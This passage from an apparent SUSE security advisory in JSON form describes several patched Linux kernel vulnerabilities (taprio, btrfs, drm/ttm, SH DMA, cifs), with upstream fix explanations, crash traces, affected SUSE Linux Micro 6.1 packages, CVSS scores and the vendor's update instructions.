"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: taprio: Limit TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME to INT_MAX.\n\nsyzkaller found zero division error [0] in div_s64_rem() called from\nget_cycle_time_elapsed(), where sched-\u003ecycle_time is the divisor.\n\nWe have tests in parse_taprio_schedule() so that cycle_time will never\nbe 0, and actually cycle_time is not 0 in get_cycle_time_elapsed().\n\nThe problem is that the types of divisor are different; cycle_time is\ns64, but the argument of div_s64_rem() is s32.\n\nsyzkaller fed this input and 0x100000000 is cast to s32 to be 0.\n\n @TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME={0xc, 0x8, 0x100000000}\n\nWe use s64 for cycle_time to cast it to ktime_t, so let\u0027s keep it and\nset max for cycle_time.\n\nWhile at it, we prevent overflow in setup_txtime() and add another\ntest in parse_taprio_schedule() to check if cycle_time overflows.\n\nAlso, we add a new tdc test case for this issue.\n\n[0]:\ndivide error: 0000 [#1] PREEMPT SMP KASAN NOPTI\nCPU: 1 PID: 103 Comm: kworker/1:3 Not tainted 6.5.0-rc1-00330-g60cc1f7d0605 #3\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nWorkqueue: ipv6_addrconf addrconf_dad_work\nRIP: 0010:div_s64_rem include/linux/math64.h:42 [inline]\nRIP: 0010:get_cycle_time_elapsed net/sched/sch_taprio.c:223 [inline]\nRIP: 0010:find_entry_to_transmit+0x252/0x7e0 net/sched/sch_taprio.c:344\nCode: 3c 02 00 0f 85 5e 05 00 00 48 8b 4c 24 08 4d 8b bd 40 01 00 00 48 8b 7c 24 48 48 89 c8 4c 29 f8 48 63 f7 48 99 48 89 74 24 70 \u003c48\u003e f7 fe 48 29 d1 48 8d 04 0f 49 89 cc 48 89 44 24 20 49 8d 85 10\nRSP: 0018:ffffc90000acf260 EFLAGS: 00010206\nRAX: 177450e0347560cf RBX: 0000000000000000 RCX: 177450e0347560cf\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000100000000\nRBP: 0000000000000056 R08: 0000000000000000 R09: ffffed10020a0934\nR10: ffff8880105049a7 R11: ffff88806cf3a520 R12: ffff888010504800\nR13: ffff88800c00d800 R14: ffff8880105049a0 R15: 0000000000000000\nFS: 0000000000000000(0000) GS:ffff88806cf00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f0edf84f0e8 CR3: 000000000d73c002 CR4: 0000000000770ee0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n get_packet_txtime net/sched/sch_taprio.c:508 [inline]\n taprio_enqueue_one+0x900/0xff0 net/sched/sch_taprio.c:577\n taprio_enqueue+0x378/0xae0 net/sched/sch_taprio.c:658\n dev_qdisc_enqueue+0x46/0x170 net/core/dev.c:3732\n __dev_xmit_skb net/core/dev.c:3821 [inline]\n __dev_queue_xmit+0x1b2f/0x3000 net/core/dev.c:4169\n dev_queue_xmit include/linux/netdevice.h:3088 [inline]\n neigh_resolve_output net/core/neighbour.c:1552 [inline]\n neigh_resolve_output+0x4a7/0x780 net/core/neighbour.c:1532\n neigh_output include/net/neighbour.h:544 [inline]\n ip6_finish_output2+0x924/0x17d0 net/ipv6/ip6_output.c:135\n __ip6_finish_output+0x620/0xaa0 net/ipv6/ip6_output.c:196\n ip6_finish_output net/ipv6/ip6_output.c:207 [inline]\n NF_HOOK_COND include/linux/netfilter.h:292 [inline]\n ip6_output+0x206/0x410 net/ipv6/ip6_output.c:228\n dst_output include/net/dst.h:458 [inline]\n NF_HOOK.constprop.0+0xea/0x260 include/linux/netfilter.h:303\n ndisc_send_skb+0x872/0xe80 net/ipv6/ndisc.c:508\n ndisc_send_ns+0xb5/0x130 net/ipv6/ndisc.c:666\n addrconf_dad_work+0xc14/0x13f0 net/ipv6/addrconf.c:4175\n process_one_work+0x92c/0x13a0 kernel/workqueue.c:2597\n worker_thread+0x60f/0x1240 kernel/workqueue.c:2748\n kthread+0x2fe/0x3f0 kernel/kthread.c:389\n ret_from_fork+0x2c/0x50 arch/x86/entry/entry_64.S:308\n \u003c/TASK\u003e\nModules linked in:",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54251",
"url": "https://www.suse.com/security/cve/CVE-2023-54251"
},
{
"category": "external",
"summary": "SUSE Bug 1255888 for CVE-2023-54251",
"url": "https://bugzilla.suse.com/1255888"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54251"
},
{
"cve": "CVE-2023-54253",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54253"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: set page extent mapped after read_folio in relocate_one_page\n\nOne of the CI runs triggered the following panic\n\n assertion failed: PagePrivate(page) \u0026\u0026 page-\u003eprivate, in fs/btrfs/subpage.c:229\n ------------[ cut here ]------------\n kernel BUG at fs/btrfs/subpage.c:229!\n Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n CPU: 0 PID: 923660 Comm: btrfs Not tainted 6.5.0-rc3+ #1\n pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n pc : btrfs_subpage_assert+0xbc/0xf0\n lr : btrfs_subpage_assert+0xbc/0xf0\n sp : ffff800093213720\n x29: ffff800093213720 x28: ffff8000932138b4 x27: 000000000c280000\n x26: 00000001b5d00000 x25: 000000000c281000 x24: 000000000c281fff\n x23: 0000000000001000 x22: 0000000000000000 x21: ffffff42b95bf880\n x20: ffff42b9528e0000 x19: 0000000000001000 x18: ffffffffffffffff\n x17: 667274622f736620 x16: 6e69202c65746176 x15: 0000000000000028\n x14: 0000000000000003 x13: 00000000002672d7 x12: 0000000000000000\n x11: ffffcd3f0ccd9204 x10: ffffcd3f0554ae50 x9 : ffffcd3f0379528c\n x8 : ffff800093213428 x7 : 0000000000000000 x6 : ffffcd3f091771e8\n x5 : ffff42b97f333948 x4 : 0000000000000000 x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff42b9556cde80 x0 : 000000000000004f\n Call trace:\n btrfs_subpage_assert+0xbc/0xf0\n btrfs_subpage_set_dirty+0x38/0xa0\n btrfs_page_set_dirty+0x58/0x88\n relocate_one_page+0x204/0x5f0\n relocate_file_extent_cluster+0x11c/0x180\n relocate_data_extent+0xd0/0xf8\n relocate_block_group+0x3d0/0x4e8\n btrfs_relocate_block_group+0x2d8/0x490\n btrfs_relocate_chunk+0x54/0x1a8\n btrfs_balance+0x7f4/0x1150\n btrfs_ioctl+0x10f0/0x20b8\n __arm64_sys_ioctl+0x120/0x11d8\n invoke_syscall.constprop.0+0x80/0xd8\n do_el0_svc+0x6c/0x158\n el0_svc+0x50/0x1b0\n el0t_64_sync_handler+0x120/0x130\n el0t_64_sync+0x194/0x198\n Code: 91098021 b0007fa0 91346000 97e9c6d2 (d4210000)\n\nThis is the same problem outlined in 17b17fcd6d44 (\"btrfs:\nset_page_extent_mapped after read_folio in btrfs_cont_expand\") , and the\nfix is the same. I originally looked for the same pattern elsewhere in\nour code, but mistakenly skipped over this code because I saw the page\ncache readahead before we set_page_extent_mapped, not realizing that\nthis was only in the !page case, that we can still end up with a\n!uptodate page and then do the btrfs_read_folio further down.\n\nThe fix here is the same as the above mentioned patch, move the\nset_page_extent_mapped call to after the btrfs_read_folio() block to\nmake sure that we have the subpage blocksize stuff setup properly before\nusing the page.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54253",
"url": "https://www.suse.com/security/cve/CVE-2023-54253"
},
{
"category": "external",
"summary": "SUSE Bug 1255891 for CVE-2023-54253",
"url": "https://bugzilla.suse.com/1255891"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54253"
},
{
"cve": "CVE-2023-54254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Don\u0027t leak a resource on eviction error\n\nOn eviction errors other than -EMULTIHOP we were leaking a resource.\nFix.\n\nv2:\n- Avoid yet another goto (Andi Shyti)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54254",
"url": "https://www.suse.com/security/cve/CVE-2023-54254"
},
{
"category": "external",
"summary": "SUSE Bug 1255890 for CVE-2023-54254",
"url": "https://bugzilla.suse.com/1255890"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54254"
},
{
"cve": "CVE-2023-54255",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54255"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsh: dma: Fix DMA channel offset calculation\n\nVarious SoCs of the SH3, SH4 and SH4A family, which use this driver,\nfeature a differing number of DMA channels, which can be distributed\nbetween up to two DMAC modules. The existing implementation fails to\ncorrectly accommodate for all those variations, resulting in wrong\nchannel offset calculations and leading to kernel panics.\n\nRewrite dma_base_addr() in order to properly calculate channel offsets\nin a DMAC module. Fix dmaor_read_reg() and dmaor_write_reg(), so that\nthe correct DMAC module base is selected for the DMAOR register.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54255",
"url": "https://www.suse.com/security/cve/CVE-2023-54255"
},
{
"category": "external",
"summary": "SUSE Bug 1255884 for CVE-2023-54255",
"url": "https://bugzilla.suse.com/1255884"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54255"
},
{
"cve": "CVE-2023-54258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix potential oops in cifs_oplock_break\n\nWith deferred close we can have closes that race with lease breaks,\nand so with the current checks for whether to send the lease response,\noplock_response(), this can mean that an unmount (kill_sb) can occur\njust before we were checking if the tcon-\u003eses is valid. See below:\n\n[Fri Aug 4 04:12:50 2023] RIP: 0010:cifs_oplock_break+0x1f7/0x5b0 [cifs]\n[Fri Aug 4 04:12:50 2023] Code: 7d a8 48 8b 7d c0 c0 e9 02 48 89 45 b8 41 89 cf e8 3e f5 ff ff 4c 89 f7 41 83 e7 01 e8 82 b3 03 f2 49 8b 45 50 48 85 c0 74 5e \u003c48\u003e 83 78 60 00 74 57 45 84 ff 75 52 48 8b 43 98 48 83 eb 68 48 39\n[Fri Aug 4 04:12:50 2023] RSP: 0018:ffffb30607ddbdf8 EFLAGS: 00010206\n[Fri Aug 4 04:12:50 2023] RAX: 632d223d32612022 RBX: ffff97136944b1e0 RCX: 0000000080100009\n[Fri Aug 4 04:12:50 2023] RDX: 0000000000000001 RSI: 0000000080100009 RDI: ffff97136944b188\n[Fri Aug 4 04:12:50 2023] RBP: ffffb30607ddbe58 R08: 0000000000000001 R09: ffffffffc08e0900\n[Fri Aug 4 04:12:50 2023] R10: 0000000000000001 R11: 000000000000000f R12: ffff97136944b138\n[Fri Aug 4 04:12:50 2023] R13: 